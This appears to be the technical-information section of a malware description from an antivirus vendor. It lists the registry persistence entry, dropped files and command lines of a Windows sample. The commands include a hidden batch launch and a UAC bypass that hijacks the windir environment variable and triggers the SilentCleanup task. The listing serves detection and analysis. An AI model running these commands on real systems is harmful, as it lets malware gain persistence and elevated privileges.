Technical information
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce] 'Ijtl' = '%LOCALAPPDATA%\Ijtl\Ijtl.hta'
- <SYSTEM32>\tapiunattend.exe
- %LOCALAPPDATA%\ijtl\ijtlest.exe
- %LOCALAPPDATA%\ijtl\ijtl.hta
- C:\users\public\cde.bat
- C:\users\public\x.bat
- C:\users\public\x.vbs
- C:\users\public\natso.bat
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\Natso.bat (with hidden window)
- '<SYSTEM32>\tapiunattend.exe'
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\Natso.bat
- '<SYSTEM32>\reg.exe' delete hkcu\Environment /v windir /f
- '<SYSTEM32>\reg.exe' add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
- '<SYSTEM32>\schtasks.exe' /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I